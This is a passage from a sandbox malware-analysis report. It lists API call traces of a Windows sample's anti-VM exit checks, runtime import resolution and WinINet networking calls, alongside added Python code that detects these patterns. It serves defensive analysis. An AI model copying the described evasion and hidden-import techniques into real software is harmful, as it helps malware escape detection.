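WININET_CHAIN = ("InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                 "HttpSendRequestA", "InternetReadFile")
ENV_PROBES = {"GetSystemInfo", "GlobalMemoryStatusEx", "VirtualAllocExNuma",
              "GetUserDefaultLangID"}

def has_ordered_chain(calls, chain=WININET_CHAIN):
    """True if every API in `chain` occurs in that order (gaps allowed)."""
    names = iter(c["api"] for c in calls)
    return all(any(n == want for n in names) for want in chain)

def environment_gates(calls):
    """(probe, exit_ref) for each ExitProcess listed right after an
    environment probe: the checks that end the process in an analysis VM."""
    return [(a["api"], b["ref"]) for a, b in zip(calls, calls[1:])
            if b["api"] == "ExitProcess" and a["api"] in ENV_PROBES]

def resolver_bursts(calls, threshold=10):
    """Module bases (first GetProcAddress argument) used to resolve at least
    `threshold` exports: runtime import resolution that keeps the real API
    set out of the PE import table."""
    counts = defaultdict(int)
    for c in calls:
        if c["api"] == "GetProcAddress" and c["args"]:
            counts[c["args"][0]] += 1
    return {base: n for base, n in counts.items() if n >= threshold}

def analyse(text):
    calls = parse_trace(text)
    return {"calls": len(calls),
            "wininet_c2_chain": has_ordered_chain(calls),
            "environment_gates": environment_gates(calls),
            "resolver_bursts": resolver_bursts(calls)}
```

                          On the embedded sample, analyse(SAMPLE) reports 31 parsed calls, the WinINet chain present, four environment gates (after GetSystemInfo, VirtualAllocExNuma, GlobalMemoryStatusEx and GetUserDefaultLangID) and one resolver burst on base 75900000. A reference line records a call site, not proof that the call ran, so rules like these describe capability rather than observed behaviour; the ExitProcess branches in particular are exactly the paths a sandbox does not take when the check passes.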
                          Strings
                          • NtQueryInformationProcess, xrefs: 005366C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: the same fifteen memory dumps listed under Memory Dump Source for the preceding function.
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: eae37022f1630ea964fb0bad67a2480bfd9fbb6d95a46e170ed397841c87059c
                          • Instruction ID: 70d539590725610a8e371abebd1c94ba1002e401331f251b28ed8309bcf20d82
                          • Opcode Fuzzy Hash: eae37022f1630ea964fb0bad67a2480bfd9fbb6d95a46e170ed397841c87059c
                          • Instruction Fuzzy Hash: CDA172BD61121ADFD794DF64EC49A2B37B9F78A640700C51BEA1583370EB39A800DF69

                          Control-flow Graph

                          (Graph edge data omitted; executed and non-executed blocks are distinguished only by colour in the rendered image.) 00531BF0: calls 00512A90 and 00536390 (the import resolver), runs a short loop at 00531C10, calls 00512930 and optionally lstrcpy; a check at 00531C35 leads either to ExitProcess (00531C65) or to GetSystemInfo, whose result leads to ExitProcess (00531C7D) or onward; calls 00511030 (VirtualAllocExNuma, with an ExitProcess branch) and 005110C0 (GlobalMemoryStatusEx, with an ExitProcess branch); GetUserDefaultLangID, with an ExitProcess branch (00531CB0); calls 00532AD0 and 00533E10, then 00532A40 and 00533E10 with another ExitProcess branch (00531CE0); assembles several strings with lstrlen, 00512930, lstrcpy and lstrcat (00531CE7-00531E2A); calls 00512A20 five times and OpenEventA; while the named event already exists it loops over CloseHandle, Sleep and OpenEventA (00531E68-00531E8A); then CreateEventA, 00531B20, 0052FFD0, CloseHandle and ExitProcess (00531EA5).
                          APIs
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A06D8), ref: 005363E9
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0648), ref: 00536402
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A05B8), ref: 0053641A
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0750), ref: 00536432
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A88C0), ref: 0053644B
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,01196940), ref: 00536463
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,01196720), ref: 0053647B
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0768), ref: 00536494
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0660), ref: 005364AC
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A07E0), ref: 005364C4
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A07F8), ref: 005364DD
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,01196740), ref: 005364F5
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0810), ref: 0053650D
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00531C2F
                          • ExitProcess.KERNEL32 ref: 00531C67
                          • GetSystemInfo.KERNEL32(?), ref: 00531C71
                          • ExitProcess.KERNEL32 ref: 00531C7F
                            • Part of subcall function 00511030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00511046
                            • Part of subcall function 00511030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0051104D
                            • Part of subcall function 00511030: ExitProcess.KERNEL32 ref: 00511058
                            • Part of subcall function 005110C0: GlobalMemoryStatusEx.KERNEL32 ref: 005110EA
                            • Part of subcall function 005110C0: ExitProcess.KERNEL32 ref: 00511114
                          • GetUserDefaultLangID.KERNEL32 ref: 00531C8F
                          • ExitProcess.KERNEL32 ref: 00531CB2
                          • ExitProcess.KERNEL32 ref: 00531CE1
                          • lstrlen.KERNEL32(011A8900), ref: 00531CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00531D15
                          • lstrcat.KERNEL32(00000000,011A8900), ref: 00531D1D
                          • lstrlen.KERNEL32(00544B98), ref: 00531D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531D48
                          • lstrcat.KERNEL32(00000000,00544B98), ref: 00531D54
                          • lstrlen.KERNEL32(00000000), ref: 00531D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531D94
                          • lstrlen.KERNEL32(00544B98), ref: 00531D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531DBC
                          • lstrcat.KERNEL32(00000000,00544B98), ref: 00531DC8
                          • lstrlen.KERNEL32(00000000), ref: 00531DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: 1b9888694a266916313f50558e57417803c9ef9a62a1898f125ba40c6f8f7512
                          • Instruction ID: 7b9f5288eaf026c600b7a0bb7c45bba5c00a8f4926c9297cef982bf610cec1dc
                          • Opcode Fuzzy Hash: 1b9888694a266916313f50558e57417803c9ef9a62a1898f125ba40c6f8f7512
                          • Instruction Fuzzy Hash: 6B71D43554061BABDB20ABB0DC4DB6F3FB9BF82701F048025FA06961A1DF789C41CB69

                          Control-flow Graph

                          control_flow_graph 2850 514a60-514afc RtlAllocateHeap 2867 514b7a-514bbe VirtualProtect 2850->2867 2868 514afe-514b03 2850->2868 2869 514b06-514b78 2868->2869 2869->2867
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00514AA2
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00514BB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot: same as the listing above
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: 8f90f8d48abf69c85310177eeeac8755e55a68b1692fe4fb27cf99081a984fa8
                          • Instruction ID: 92b6c8ec278aa15014a62498c8f52dfcd21c9edaf17a035de0ebf1300bdcdb01
                          • Opcode Fuzzy Hash: 8f90f8d48abf69c85310177eeeac8755e55a68b1692fe4fb27cf99081a984fa8
                          • Instruction Fuzzy Hash: D931E138FC0A2C769620EBEF4C4BFDF6E55FF85BA8B2280567408571C0C9B15501EEA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00532A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00532A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00532A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot: same as the listing above
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 31ba5727a6b79aee0971a2f4563029d930cbd16914b44dcefbc53a71a542149f
                          • Instruction ID: 55df9cff7ed8e2e6ae02935660f9119f85843bf2e625f0a9d67746dfcaddbf19
                          • Opcode Fuzzy Hash: 31ba5727a6b79aee0971a2f4563029d930cbd16914b44dcefbc53a71a542149f
                          • Instruction Fuzzy Hash: 76F0B4B5A40208ABC710DF88DD49B9EBBBCF705B21F000217FA15E3690D7B8190486A1

                          Control-flow Graph

                          control_flow_graph 633 5366e0-5366e7 634 536afe-536b92 LoadLibraryA * 8 633->634 635 5366ed-536af9 GetProcAddress * 43 633->635 636 536b94-536c03 GetProcAddress * 5 634->636 637 536c08-536c0f 634->637 635->634 636->637 638 536cd2-536cd9 637->638 639 536c15-536ccd GetProcAddress * 8 637->639 640 536cdb-536d4a GetProcAddress * 5 638->640 641 536d4f-536d56 638->641 639->638 640->641 642 536de9-536df0 641->642 643 536d5c-536de4 GetProcAddress * 6 641->643 644 536f10-536f17 642->644 645 536df6-536f0b GetProcAddress * 12 642->645 643->642 646 536f19-536f88 GetProcAddress * 5 644->646 647 536f8d-536f94 644->647 645->644 646->647 648 536fc1-536fc8 647->648 649 536f96-536fbc GetProcAddress * 2 647->649 650 536ff5-536ffc 648->650 651 536fca-536ff0 GetProcAddress * 2 648->651 649->648 652 537002-5370e8 GetProcAddress * 10 650->652 653 5370ed-5370f4 650->653 651->650 652->653 654 537152-537159 653->654 655 5370f6-53714d GetProcAddress * 4 653->655 656 53715b-537169 GetProcAddress 654->656 657 53716e-537175 654->657 655->654 656->657 658 5371d3 657->658 659 537177-5371ce GetProcAddress * 4 657->659 659->658
                          APIs
                          • GetProcAddress.KERNEL32(75900000,011968A0), ref: 005366F5
                          • GetProcAddress.KERNEL32(75900000,01196920), ref: 0053670D
                          • GetProcAddress.KERNEL32(75900000,011A8C28), ref: 00536726
                          • GetProcAddress.KERNEL32(75900000,011A8C70), ref: 0053673E
                          • GetProcAddress.KERNEL32(75900000,011AC9C8), ref: 00536756
                          • GetProcAddress.KERNEL32(75900000,011ACB00), ref: 0053676F
                          • GetProcAddress.KERNEL32(75900000,0119B338), ref: 00536787
                          • GetProcAddress.KERNEL32(75900000,011ACB18), ref: 0053679F
                          • GetProcAddress.KERNEL32(75900000,011AC968), ref: 005367B8
                          • GetProcAddress.KERNEL32(75900000,011ACB60), ref: 005367D0
                          • GetProcAddress.KERNEL32(75900000,011ACAE8), ref: 005367E8
                          • GetProcAddress.KERNEL32(75900000,01196960), ref: 00536801
                          • GetProcAddress.KERNEL32(75900000,01196760), ref: 00536819
                          • GetProcAddress.KERNEL32(75900000,011967E0), ref: 00536831
                          • GetProcAddress.KERNEL32(75900000,01196980), ref: 0053684A
                          • GetProcAddress.KERNEL32(75900000,011AC9E0), ref: 00536862
                          • GetProcAddress.KERNEL32(75900000,011ACBC0), ref: 0053687A
                          • GetProcAddress.KERNEL32(75900000,0119AE88), ref: 00536893
                          • GetProcAddress.KERNEL32(75900000,011969A0), ref: 005368AB
                          • GetProcAddress.KERNEL32(75900000,011AC9F8), ref: 005368C3
                          • GetProcAddress.KERNEL32(75900000,011ACC08), ref: 005368DC
                          • GetProcAddress.KERNEL32(75900000,011ACB90), ref: 005368F4
                          • GetProcAddress.KERNEL32(75900000,011AC998), ref: 0053690C
                          • GetProcAddress.KERNEL32(75900000,011969C0), ref: 00536925
                          • GetProcAddress.KERNEL32(75900000,011ACB78), ref: 0053693D
                          • GetProcAddress.KERNEL32(75900000,011ACA10), ref: 00536955
                          • GetProcAddress.KERNEL32(75900000,011ACBD8), ref: 0053696E
                          • GetProcAddress.KERNEL32(75900000,011ACBA8), ref: 00536986
                          • GetProcAddress.KERNEL32(75900000,011ACBF0), ref: 0053699E
                          • GetProcAddress.KERNEL32(75900000,011AC920), ref: 005369B7
                          • GetProcAddress.KERNEL32(75900000,011AC9B0), ref: 005369CF
                          • GetProcAddress.KERNEL32(75900000,011ACA28), ref: 005369E7
                          • GetProcAddress.KERNEL32(75900000,011AC938), ref: 00536A00
                          • GetProcAddress.KERNEL32(75900000,011A9B08), ref: 00536A18
                          • GetProcAddress.KERNEL32(75900000,011ACA58), ref: 00536A30
                          • GetProcAddress.KERNEL32(75900000,011ACA70), ref: 00536A49
                          • GetProcAddress.KERNEL32(75900000,011969E0), ref: 00536A61
                          • GetProcAddress.KERNEL32(75900000,011ACA40), ref: 00536A79
                          • GetProcAddress.KERNEL32(75900000,01196A00), ref: 00536A92
                          • GetProcAddress.KERNEL32(75900000,011AC950), ref: 00536AAA
                          • GetProcAddress.KERNEL32(75900000,011AC980), ref: 00536AC2
                          • GetProcAddress.KERNEL32(75900000,01196540), ref: 00536ADB
                          • GetProcAddress.KERNEL32(75900000,011963A0), ref: 00536AF3
                          • LoadLibraryA.KERNEL32(011ACB30,0053051F), ref: 00536B05
                          • LoadLibraryA.KERNEL32(011ACA88), ref: 00536B16
                          • LoadLibraryA.KERNEL32(011ACAA0), ref: 00536B28
                          • LoadLibraryA.KERNEL32(011ACAB8), ref: 00536B3A
                          • LoadLibraryA.KERNEL32(011ACAD0), ref: 00536B4B
                          • LoadLibraryA.KERNEL32(011ACB48), ref: 00536B5D
                          • LoadLibraryA.KERNEL32(011ACF08), ref: 00536B6F
                          • LoadLibraryA.KERNEL32(011ACCC8), ref: 00536B80
                          • GetProcAddress.KERNEL32(75FD0000,01196460), ref: 00536B9C
                          • GetProcAddress.KERNEL32(75FD0000,011ACD40), ref: 00536BB4
                          • GetProcAddress.KERNEL32(75FD0000,011A88A0), ref: 00536BCD
                          • GetProcAddress.KERNEL32(75FD0000,011ACED8), ref: 00536BE5
                          • GetProcAddress.KERNEL32(75FD0000,01196360), ref: 00536BFD
                          • GetProcAddress.KERNEL32(734B0000,0119AF78), ref: 00536C1D
                          • GetProcAddress.KERNEL32(734B0000,011962A0), ref: 00536C35
                          • GetProcAddress.KERNEL32(734B0000,0119B068), ref: 00536C4E
                          • GetProcAddress.KERNEL32(734B0000,011ACEF0), ref: 00536C66
                          • GetProcAddress.KERNEL32(734B0000,011ACC20), ref: 00536C7E
                          • GetProcAddress.KERNEL32(734B0000,01196440), ref: 00536C97
                          • GetProcAddress.KERNEL32(734B0000,011964C0), ref: 00536CAF
                          • GetProcAddress.KERNEL32(734B0000,011ACDA0), ref: 00536CC7
                          • GetProcAddress.KERNEL32(763B0000,01196520), ref: 00536CE3
                          • GetProcAddress.KERNEL32(763B0000,01196640), ref: 00536CFB
                          • GetProcAddress.KERNEL32(763B0000,011ACD28), ref: 00536D14
                          • GetProcAddress.KERNEL32(763B0000,011ACD10), ref: 00536D2C
                          • GetProcAddress.KERNEL32(763B0000,01196420), ref: 00536D44
                          • GetProcAddress.KERNEL32(750F0000,0119B0B8), ref: 00536D64
                          • GetProcAddress.KERNEL32(750F0000,0119B1F8), ref: 00536D7C
                          • GetProcAddress.KERNEL32(750F0000,011ACCB0), ref: 00536D95
                          • GetProcAddress.KERNEL32(750F0000,011964E0), ref: 00536DAD
                          • GetProcAddress.KERNEL32(750F0000,01196580), ref: 00536DC5
                          • GetProcAddress.KERNEL32(750F0000,0119B1A8), ref: 00536DDE
                          • GetProcAddress.KERNEL32(75A50000,011ACE48), ref: 00536DFE
                          • GetProcAddress.KERNEL32(75A50000,01196480), ref: 00536E16
                          • GetProcAddress.KERNEL32(75A50000,011A8980), ref: 00536E2F
                          • GetProcAddress.KERNEL32(75A50000,011ACE18), ref: 00536E47
                          • GetProcAddress.KERNEL32(75A50000,011ACD58), ref: 00536E5F
                          • GetProcAddress.KERNEL32(75A50000,011964A0), ref: 00536E78
                          • GetProcAddress.KERNEL32(75A50000,011965A0), ref: 00536E90
                          • GetProcAddress.KERNEL32(75A50000,011ACCE0), ref: 00536EA8
                          • GetProcAddress.KERNEL32(75A50000,011ACDB8), ref: 00536EC1
                          • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 00536ED7
                          • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 00536EEE
                          • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00536F05
                          • GetProcAddress.KERNEL32(75070000,01196380), ref: 00536F21
                          • GetProcAddress.KERNEL32(75070000,011ACDD0), ref: 00536F39
                          • GetProcAddress.KERNEL32(75070000,011ACCF8), ref: 00536F52
                          • GetProcAddress.KERNEL32(75070000,011ACD70), ref: 00536F6A
                          • GetProcAddress.KERNEL32(75070000,011ACD88), ref: 00536F82
                          • GetProcAddress.KERNEL32(74E50000,01196660), ref: 00536F9E
                          • GetProcAddress.KERNEL32(74E50000,01196560), ref: 00536FB6
                          • GetProcAddress.KERNEL32(75320000,01196500), ref: 00536FD2
                          • GetProcAddress.KERNEL32(75320000,011ACE60), ref: 00536FEA
                          • GetProcAddress.KERNEL32(6F060000,01196600), ref: 0053700A
                          • GetProcAddress.KERNEL32(6F060000,011965C0), ref: 00537022
                          • GetProcAddress.KERNEL32(6F060000,01196400), ref: 0053703B
                          • GetProcAddress.KERNEL32(6F060000,011ACDE8), ref: 00537053
                          • GetProcAddress.KERNEL32(6F060000,011965E0), ref: 0053706B
                          • GetProcAddress.KERNEL32(6F060000,01196280), ref: 00537084
                          • GetProcAddress.KERNEL32(6F060000,01196620), ref: 0053709C
                          • GetProcAddress.KERNEL32(6F060000,011962C0), ref: 005370B4
                          • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 005370CB
                          • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 005370E2
                          • GetProcAddress.KERNEL32(74E00000,011ACE00), ref: 005370FE
                          • GetProcAddress.KERNEL32(74E00000,011A88F0), ref: 00537116
                          • GetProcAddress.KERNEL32(74E00000,011ACE30), ref: 0053712F
                          • GetProcAddress.KERNEL32(74E00000,011ACE78), ref: 00537147
                          • GetProcAddress.KERNEL32(74DF0000,011962E0), ref: 00537163
                          • GetProcAddress.KERNEL32(6CF00000,011ACE90), ref: 0053717F
                          • GetProcAddress.KERNEL32(6CF00000,01196300), ref: 00537197
                          • GetProcAddress.KERNEL32(6CF00000,011ACEA8), ref: 005371B0
                          • GetProcAddress.KERNEL32(6CF00000,011ACEC0), ref: 005371C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot: same as the listing above
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: 712b18823ec3b6885107e736e8e007cde1c968e66126cec3e0487f0ab5c76e3e
                          • Instruction ID: 38481840c3efb74af1ef28e2fb3a876b8d3a1580cb2e812f006a6cea381b926e
                          • Opcode Fuzzy Hash: 712b18823ec3b6885107e736e8e007cde1c968e66126cec3e0487f0ab5c76e3e
                          • Instruction Fuzzy Hash: B06253BD61121ADFD794DF64EC89A2B37B9F78A201300C51BEA5583374EB3D9800DB29
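The 005366E0 listing is an import resolver: the graph shows 43 GetProcAddress calls against handle 75900000 before any LoadLibraryA, then eight LoadLibraryA calls and further batches of GetProcAddress per returned handle. Joe Sandbox could print the name argument as text for only five of them (CreateDesktopA, OpenDesktopA, CloseDesktop, InternetSetOptionA, HttpQueryInfoA); every other name argument is a pointer in the 0119xxxx/011Axxxx range, well outside the dumped image that starts at 00510000 per the Memory Dump Source lines, which is consistent with names that only exist in memory at run time and is what the "Extensive use of GetProcAddress" signature in the summary flags. The added example below (not part of the report; the excerpt, the image bound and the thresholds are this example's own assumptions) parses lines in the listing's format into the summary an analyst would record: resolutions per module handle, which names are visible, how many live outside the image, and which handle was in use before the first LoadLibraryA (a module already loaded in the process; the page does not say which).

```python
"""Per-module summary of the GetProcAddress/LoadLibraryA resolver in 005366E0.  Added
example, not part of the Joe Sandbox report.  API_LINES is an excerpt (13 of the 115
lines) copied from the listing above; IMAGE approximates the dumped PE (base 0x00510000,
last region 0x00BA3000, from the Memory Dump Source lines) and, like the thresholds in
summarize(), is this example's own assumption."""
import re
from collections import defaultdict

IMAGE = (0x00510000, 0x00BA4000)   # assumption: one contiguous span covering the dumped image regions

API_LINES = """
GetProcAddress.KERNEL32(75900000,011968A0), ref: 005366F5
GetProcAddress.KERNEL32(75900000,01196920), ref: 0053670D
GetProcAddress.KERNEL32(75900000,011963A0), ref: 00536AF3
LoadLibraryA.KERNEL32(011ACB30,0053051F), ref: 00536B05
LoadLibraryA.KERNEL32(011ACA88), ref: 00536B16
GetProcAddress.KERNEL32(75FD0000,01196460), ref: 00536B9C
GetProcAddress.KERNEL32(734B0000,0119AF78), ref: 00536C1D
GetProcAddress.KERNEL32(75A50000,011ACE48), ref: 00536DFE
GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 00536ED7
GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 00536EEE
GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00536F05
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 005370CB
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 005370E2
"""

LINE = re.compile(r"^\W*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]{8})$")   # "• api.DLL(args), ref: addr"
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_api_lines(text):
    """Yield (api, dll, args, ref) per line; 8-digit hex args become ints, anything else stays a string."""
    for line in text.strip().splitlines():
        m = LINE.match(line.strip())
        if m:
            api, dll, raw, ref = m.groups()
            args = [int(a, 16) if HEX8.match(a) else a for a in raw.split(",") if a]
            yield api, dll, args, int(ref, 16)


def classify_name(arg):
    """Where the GetProcAddress name argument lives: readable string, inside the image, or elsewhere."""
    if isinstance(arg, str):
        return "literal"                        # the sandbox could read the name at the pointer
    return "in-image" if IMAGE[0] <= arg < IMAGE[1] else "outside-image"   # outside: built at run time


def summarize(text=API_LINES):
    calls = list(parse_api_lines(text))
    first_load = min((ref for api, _, _, ref in calls if api == "LoadLibraryA"), default=None)
    modules = defaultdict(lambda: {"total": 0, "literal": [], "outside_image": 0, "before_loadlibrary": False})
    for api, _, args, ref in calls:
        if api != "GetProcAddress" or len(args) < 2 or not isinstance(args[0], int):
            continue
        m = modules[f"{args[0]:08X}"]
        m["total"] += 1
        kind = classify_name(args[1])
        if kind == "literal":
            m["literal"].append(args[1])
        elif kind == "outside-image":
            m["outside_image"] += 1
        if first_load is None or ref < first_load:     # resolved from a module that was already loaded
            m["before_loadlibrary"] = True
    total = sum(m["total"] for m in modules.values())
    hidden = sum(m["outside_image"] for m in modules.values())
    return {
        "modules": dict(modules),
        "loadlibrary_calls": sum(api == "LoadLibraryA" for api, *_ in calls),
        "getprocaddress_calls": total,
        "hidden_share": hidden / total if total else 0.0,
        # thresholds are this example's assumption: many resolutions, most names not visible in the image
        "looks_like_resolver_stub": total >= 10 and hidden >= total / 2,
    }


if __name__ == "__main__":
    s = summarize()
    print(f'{s["getprocaddress_calls"]} GetProcAddress, {s["loadlibrary_calls"]} LoadLibraryA, '
          f'{s["hidden_share"]:.0%} of names outside the image, stub={s["looks_like_resolver_stub"]}')
    for handle, m in s["modules"].items():
        print(handle, m)
```

On the excerpt the summary reports 11 GetProcAddress and 2 LoadLibraryA calls, handle 75900000 in use before the first LoadLibraryA, and 6 of 11 names outside the image; pasted over the full listing, the same code counts 107 resolutions across 13 handles, 8 LoadLibraryA calls and 5 visible names, so 102 names never appear as readable strings in the dump.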
                          APIs
                          • lstrlen.KERNEL32(0053CFEC), ref: 0052F1D5
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F1F1
                          • lstrlen.KERNEL32(0053CFEC), ref: 0052F1FC
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F215
                          • lstrlen.KERNEL32(0053CFEC), ref: 0052F220
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F239
                          • lstrcpy.KERNEL32(00000000,00544FA0), ref: 0052F25E
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F28C
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F2C0
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052F2F0
                          • lstrlen.KERNEL32(01196900), ref: 0052F315
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot: same as the listing above
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: b939c5eb3dde87e61703bd861252a5ed71fb58f49f6b2a64017ddf56bb25a069
                          • Instruction ID: e97c6684b440793cbde0af05e55ad70ff41301e88cf7cfb9719ce49de27d29ed
                          • Opcode Fuzzy Hash: b939c5eb3dde87e61703bd861252a5ed71fb58f49f6b2a64017ddf56bb25a069
                          • Instruction Fuzzy Hash: 47A24C74A012168FDB20DF69F948A5ABFF5BF46704F18847AE809DB2A1DB35DC81CB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00530013
                          • lstrlen.KERNEL32(0053CFEC), ref: 005300BD
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005300E1
                          • lstrlen.KERNEL32(0053CFEC), ref: 005300EC
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00530110
                          • lstrlen.KERNEL32(0053CFEC), ref: 0053011B
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0053013F
                          • lstrlen.KERNEL32(0053CFEC), ref: 0053015A
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00530189
                          • lstrlen.KERNEL32(0053CFEC), ref: 00530194
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005301C3
                          • lstrlen.KERNEL32(0053CFEC), ref: 005301CE
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00530206
                          • lstrlen.KERNEL32(0053CFEC), ref: 00530250
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00530288
                          • lstrcpy.KERNEL32(00000000,?), ref: 0053059B
                          • lstrlen.KERNEL32(01196700), ref: 005305AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 005305D7
                          • lstrcat.KERNEL32(00000000,?), ref: 005305E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0053060E
                          • lstrlen.KERNEL32(011ADC78), ref: 00530625
                          • lstrcpy.KERNEL32(00000000,?), ref: 0053064C
                          • lstrcat.KERNEL32(00000000,?), ref: 00530658
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00530681
